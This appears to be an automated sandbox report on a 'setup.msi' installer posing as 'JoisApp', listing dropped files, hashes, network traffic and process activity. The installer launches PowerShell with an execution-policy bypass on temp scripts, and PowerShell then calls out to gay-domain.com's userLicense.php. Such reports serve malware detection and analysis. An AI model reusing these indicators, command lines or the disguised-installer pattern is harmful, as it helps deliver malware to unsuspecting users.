                  Preview:...@IXOS.@.....@.r.X.@.....@.....@.....@.....@.....@......&.{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}..JoisApp..setup.msi.@.....@.....@.....@......icon_31.exe..&.{BCD29B76-7AAB-464F-8087-3934E74A40A6}.....@.....@.....@.....@.......@.....@.....@.......@......JoisApp......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@6....@.....@.]....&.{1F3FBE01-7522-4F00-979B-D5298497DD99}7.C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\.@.......@.....@.....@......&.{48980612-759A-424A-8EED-F5EB16DA0D3F},.01:\Software\Uifie Public Co\JoisApp\Version.@.......@.....@.....@......&.{9F9A61E0-BEAA-43E2-97E4-10B819357B2E}M.C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\steamerrorreporter.exe.@.......@.....@.....@......&.{14E95683-EBC2-405D-B480-B5C8551872DF}@.C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\UnRAR.exe.@.......@.....@.....@......&.{8CC0B5AB-4ECC-4D13-B26C-276315F2D6

                  C:\Windows\Installer\SourceHash{C7E6E451-02A3-4DC3-B2F7-C5FDB39DC91C}

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):20480
                  Entropy (8bit):1.162305709160552
                  Encrypted:false
                  SSDEEP:
                  MD5:092D354A0A4A20841A9BB269ED42A30F
                  SHA1:1CD58248C46FBEF41A63E177CD50D62B3F6B1CCB
                  SHA-256:F3593FD398774B766A106A71BF52CEB9D09CDF6C1C365C8F8EA3F27B323A315B
                  SHA-512:89539F2DF5087CEBFDF87BFDCDB5D6080BD071CDD14EC4DAF19DDF123A5701394503F851C4ACF44242F64D24A641D32D86D8ACC57014380C2D88820998A76C21
                  Malicious:false
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Installer\inprogressinstallinfo.ipi

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):20480
                  Entropy (8bit):1.5324903605314906
                  Encrypted:false
                  SSDEEP:
                  MD5:90FAB923C36DA8EFA4855B96A7EC8CBF
                  SHA1:455F5A53407091224EB39D022B76658E70A1B10A
                  SHA-256:F9C9B78346B21A07E86B16CEC274E9F458C540E9A4432D5031EA0665CB4EDC26
                  SHA-512:2EA4E966B08D5F09C7132ACD1064C0C2086837A36F553F70E550BBFB0909EBC3D9356310A0A21483906D0BCC98403676548F6726490AC0557073D612C95FDAAF
                  Malicious:false
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):432221
                  Entropy (8bit):5.375182781066342
                  Encrypted:false
                  SSDEEP:
                  MD5:A027B7A25E57754E41F010D72A8E5B62
                  SHA1:A6C35DDC62FBD3F088F10D39BF0E9511A3CB59B3
                  SHA-256:FA1945F58DB159B8212D7F09470C5D7A9985489BB66A57D8AEDF3220D7E19070
                  SHA-512:D9F7369E7BEC37C5E15D2E4A5914247A7E2C7738A957F9C2830D3A39428C34E367E2EEED4DB1EF58B5855CD000A2E6BCE16EE1273A1D43B4C2EAF056546E180B
                  Malicious:false
                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                  C:\Windows\Temp\~DF329A3AA316082E4C.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):20480
                  Entropy (8bit):1.5324903605314906
                  Encrypted:false
                  SSDEEP:
                  MD5:90FAB923C36DA8EFA4855B96A7EC8CBF
                  SHA1:455F5A53407091224EB39D022B76658E70A1B10A
                  SHA-256:F9C9B78346B21A07E86B16CEC274E9F458C540E9A4432D5031EA0665CB4EDC26
                  SHA-512:2EA4E966B08D5F09C7132ACD1064C0C2086837A36F553F70E550BBFB0909EBC3D9356310A0A21483906D0BCC98403676548F6726490AC0557073D612C95FDAAF
                  Malicious:false
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DF490A6790C1A4D0F9.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):73728
                  Entropy (8bit):0.12553738845894058
                  Encrypted:false
                  SSDEEP:
                  MD5:18AEA1E805295A3EA7F1B3937EC2D227
                  SHA1:E9AF7867796F3D9F85FD895B29AE9A85DECA7538
                  SHA-256:EA5243E6B66AB4832FB73D6B110AB0DD8E1D744C9A0145C139CCFEC8FD9EEEE2
                  SHA-512:3D51543F9D1612E3D1868717452F42F97FF4A877B2D484902BD51AACB05A8193FDBAEC27197C57523830DCE0E22673BA0584EDEA45C20B914D44AA3E94284982
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DF51F1BF394124ADCD.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DF565464BD0D1AF5B3.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):0.06887493792522058
                  Encrypted:false
                  SSDEEP:
                  MD5:BC3B2BF351248CA36506345C9D3F1802
                  SHA1:DDF1646C8D4149F92DF7663A28C78BBDC0E50F70
                  SHA-256:38F83E807236BB0105EFD9A8149EBC2828B53A42C36B6E9BD0AEF4D798192A49
                  SHA-512:4F7768370E36DFBA8CAB8332DE28AB2019F0593DA57900A15953A2EEA72AA5377E14391846047DDDCBD150067CF1B00D6D629DCBE08682CF83BBBCA707D3ADD5
                  Malicious:false
                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DF5BAA4C353D6EFE6D.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DF63DFDA173C93B2DA.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):1.2313740669496036
                  Encrypted:false
                  SSDEEP:
                  MD5:C3143B03211A46313DB845DCC21B38B6
                  SHA1:978A31BFE7492221C00D65B4826EBCC8CBC201D6
                  SHA-256:320A5C43AC7FC8A080743466A92E5E8A1CF27221C2A68927D6BADF3AA530C4F5
                  SHA-512:9DD7277BB06C0BCFE7D1EECA51D20F61F1CC1BE7E18CA4E9867BB968323E1657EAE1FA2223225BDB32393C98882C1A938ADAC73F54813C8B97A37F08CBAD1011
                  Malicious:false
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DF720AE72BBD10BCAD.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):1.2313740669496036
                  Encrypted:false
                  SSDEEP:
                  MD5:C3143B03211A46313DB845DCC21B38B6
                  SHA1:978A31BFE7492221C00D65B4826EBCC8CBC201D6
                  SHA-256:320A5C43AC7FC8A080743466A92E5E8A1CF27221C2A68927D6BADF3AA530C4F5
                  SHA-512:9DD7277BB06C0BCFE7D1EECA51D20F61F1CC1BE7E18CA4E9867BB968323E1657EAE1FA2223225BDB32393C98882C1A938ADAC73F54813C8B97A37F08CBAD1011
                  Malicious:false
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DF932B8DC9C3D1AC9C.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DFA52A27C63467EA69.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):1.2313740669496036
                  Encrypted:false
                  SSDEEP:
                  MD5:C3143B03211A46313DB845DCC21B38B6
                  SHA1:978A31BFE7492221C00D65B4826EBCC8CBC201D6
                  SHA-256:320A5C43AC7FC8A080743466A92E5E8A1CF27221C2A68927D6BADF3AA530C4F5
                  SHA-512:9DD7277BB06C0BCFE7D1EECA51D20F61F1CC1BE7E18CA4E9867BB968323E1657EAE1FA2223225BDB32393C98882C1A938ADAC73F54813C8B97A37F08CBAD1011
                  Malicious:false
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DFB7F0C2633F6CC7BC.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:Composite Document File V2 Document, Cannot read section info
                  Category:dropped
                  Size (bytes):20480
                  Entropy (8bit):1.5324903605314906
                  Encrypted:false
                  SSDEEP:
                  MD5:90FAB923C36DA8EFA4855B96A7EC8CBF
                  SHA1:455F5A53407091224EB39D022B76658E70A1B10A
                  SHA-256:F9C9B78346B21A07E86B16CEC274E9F458C540E9A4432D5031EA0665CB4EDC26
                  SHA-512:2EA4E966B08D5F09C7132ACD1064C0C2086837A36F553F70E550BBFB0909EBC3D9356310A0A21483906D0BCC98403676548F6726490AC0557073D612C95FDAAF
                  Malicious:false
                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DFD6CADD20AD474E0A.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Windows\Temp\~DFF392CEFFA99FEF27.TMP

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):512
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:
                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                  Malicious:false
                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {BCD29B76-7AAB-464F-8087-3934E74A40A6}, Number of Words: 10, Subject: JoisApp, Author: Uifie Public Co, Name of Creating Application: JoisApp, Template: ;1033, Comments: This installer database contains the logic and data required to install JoisApp., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Tue Jun 11 18:02:03 2024, Last Saved Time/Date: Tue Jun 11 18:02:03 2024, Last Printed: Tue Jun 11 18:02:03 2024, Number of Pages: 450
                  Entropy (8bit):7.941556232479895
                  TrID:
                  • Windows SDK Setup Transform Script (63028/2) 88.73%
                  • Generic OLE2 / Multistream Compound File (8008/1) 11.27%
                  File name:setup.msi
                  File size:25'227'264 bytes
                  MD5:d06b110d3ce70b99849be9b67e0628e5
                  SHA1:5d4d89cd45ef98d53960a02187785827c6d80e7a
                  SHA256:1b1ab24f18299a51ac735702d501f92e627065666293ec5f31431e9b0997870b
                  SHA512:2bc57d58c79fe0b9564f41692e295f732c41d30abf343a3b63026833032e3dae7dd3f434e8276c4a154fcb2d65b404603a20667ad3804ce57eca9fb01dd48cec
                  SSDEEP:393216:YVZx5xy2zuYLOy4ORNcN3Lkk2dhSm0pcktXS7f2EBLqayZF3A90NbpO7EVIddzME:YbNyIKORg3LFud0ppof2dRpOEJN
                  TLSH:D547232279F5E61ADAAB333AADF94F8740993D79CB6424DB73B437B544704C20636A03
                  File Content Preview:........................>.......................................................m.......................................................p...............................................................W...X...Y...Z...[...\...]...^..._...`...a...b...c...d..

                  File Icon

                  Icon Hash:2d2e3797b32b2b99

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jun 11, 2024 20:22:59.064938068 CEST4973180192.168.2.4172.67.154.227
                  Jun 11, 2024 20:22:59.070260048 CEST8049731172.67.154.227192.168.2.4
                  Jun 11, 2024 20:22:59.070424080 CEST4973180192.168.2.4172.67.154.227
                  Jun 11, 2024 20:22:59.071304083 CEST4973180192.168.2.4172.67.154.227
                  Jun 11, 2024 20:22:59.077126980 CEST8049731172.67.154.227192.168.2.4
                  Jun 11, 2024 20:22:59.683852911 CEST8049731172.67.154.227192.168.2.4
                  Jun 11, 2024 20:22:59.686808109 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:22:59.686862946 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:22:59.686943054 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:22:59.694077969 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:22:59.694111109 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:22:59.725873947 CEST4973180192.168.2.4172.67.154.227
                  Jun 11, 2024 20:23:00.316127062 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:23:00.316200018 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:23:00.320216894 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:23:00.320233107 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:23:00.320472002 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:23:00.327255011 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:23:00.372546911 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:23:00.964102983 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:23:00.964179039 CEST44349732172.67.154.227192.168.2.4
                  Jun 11, 2024 20:23:00.964263916 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:23:00.975560904 CEST49732443192.168.2.4172.67.154.227
                  Jun 11, 2024 20:23:01.165334940 CEST4973180192.168.2.4172.67.154.227

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jun 11, 2024 20:22:59.040509939 CEST5943853192.168.2.41.1.1.1
                  Jun 11, 2024 20:22:59.058427095 CEST53594381.1.1.1192.168.2.4

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Jun 11, 2024 20:22:59.040509939 CEST192.168.2.41.1.1.10xf1b8Standard query (0)gay-domain.comA (IP address)IN (0x0001)false

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Jun 11, 2024 20:22:59.058427095 CEST1.1.1.1192.168.2.40xf1b8No error (0)gay-domain.com172.67.154.227A (IP address)IN (0x0001)false
                  Jun 11, 2024 20:22:59.058427095 CEST1.1.1.1192.168.2.40xf1b8No error (0)gay-domain.com104.21.6.138A (IP address)IN (0x0001)false

                  HTTP Request Dependency Graph

                  • gay-domain.com

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449731172.67.154.227807060C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  Jun 11, 2024 20:22:59.071304083 CEST206OUTGET /userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67 HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: gay-domain.com
                  Connection: Keep-Alive
                  Jun 11, 2024 20:22:59.683852911 CEST872INHTTP/1.1 301 Moved Permanently
                  Date: Tue, 11 Jun 2024 18:22:59 GMT
                  Content-Type: text/html
                  Content-Length: 167
                  Connection: keep-alive
                  Cache-Control: max-age=3600
                  Expires: Tue, 11 Jun 2024 19:22:59 GMT
                  Location: https://gay-domain.com/userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=slvopj9mPsPU971aGfu1N9YZ0nCRLgzXP1NSRHWwZPtJRlbBe1OBT%2F8uX2ITG%2F5hcvU6J6PjQwyVthm937KcOSAALs5sfCWqgqBvaUK1%2Bgjtfr%2B%2B7S0LCZfjRgHb%2BwnsbQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8923a1369c43e74a-DFW
                  alt-svc: h3=":443"; ma=86400
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.449732172.67.154.2274437060C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  TimestampBytes transferredDirectionData
                  2024-06-11 18:23:00 UTC206OUTGET /userLicense.php?iugeh=9501&aigfj=sojgjf&sufv=67 HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                  Host: gay-domain.com
                  Connection: Keep-Alive
                  2024-06-11 18:23:00 UTC626INHTTP/1.1 200 OK
                  Date: Tue, 11 Jun 2024 18:23:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: close
                  Vary: Accept-Encoding
                  Cache-Control: no-store
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ppatTtVRr7xlxXTqLI%2BpNBLtWw8r%2Fg%2FuflPC8FEh6YjMBp8Yb3SEYhvg3mSjoaFdzEGQs4smE45SNTdu6%2BLDl4xtyRBX4KTbd9cYUH3Sb9yHcSIvuyuMuy8wEWrb1hT6Dg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8923a13b7d062e54-DFW
                  alt-svc: h3=":443"; ma=86400
                  2024-06-11 18:23:00 UTC22INData Raw: 31 30 0d 0a 7b 20 22 72 65 73 75 6c 74 22 20 3a 20 30 20 7d 0d 0a
                  Data Ascii: 10{ "result" : 0 }
                  2024-06-11 18:23:00 UTC5INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:14:22:55
                  Start date:11/06/2024
                  Path:C:\Windows\System32\msiexec.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\setup.msi"
                  Imagebase:0x7ff6c52e0000
                  File size:69'632 bytes
                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:1
                  Start time:14:22:55
                  Start date:11/06/2024
                  Path:C:\Windows\System32\msiexec.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\msiexec.exe /V
                  Imagebase:0x7ff6c52e0000
                  File size:69'632 bytes
                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  General

                  Target ID:2
                  Start time:14:22:56
                  Start date:11/06/2024
                  Path:C:\Windows\SysWOW64\msiexec.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 76F054D823F7B346F706921024C133C7
                  Imagebase:0xf40000
                  File size:59'904 bytes
                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:3
                  Start time:14:22:57
                  Start date:11/06/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC17B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiC168.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrC169.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrC16A.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                  Imagebase:0x740000
                  File size:433'152 bytes
                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  General

                  Target ID:4
                  Start time:14:22:57
                  Start date:11/06/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Disassembly

                  No disassembly